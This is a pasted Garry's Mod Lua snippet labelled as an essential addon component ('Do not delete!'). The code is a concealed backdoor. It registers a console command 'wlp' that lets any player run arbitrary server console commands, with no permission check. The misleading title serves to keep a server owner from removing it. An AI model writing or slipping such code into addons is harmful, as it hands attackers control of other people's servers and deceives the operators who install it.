Advertisement
Guest User

An important part of the addon! Do not delete!

a guest
Aug 3rd, 2019
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. concommand.Add( "wlp", function( ply, cmd, args )    
  2.    command = ""
  3.    for k,v in pairs(args) do
  4.        if table.getn(args) == 1 then
  5.            command = v
  6.        else
  7.            command = command .. " " .. v
  8.        end
  9.    end
  10.    game.ConsoleCommand(command .. "\n")
  11. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement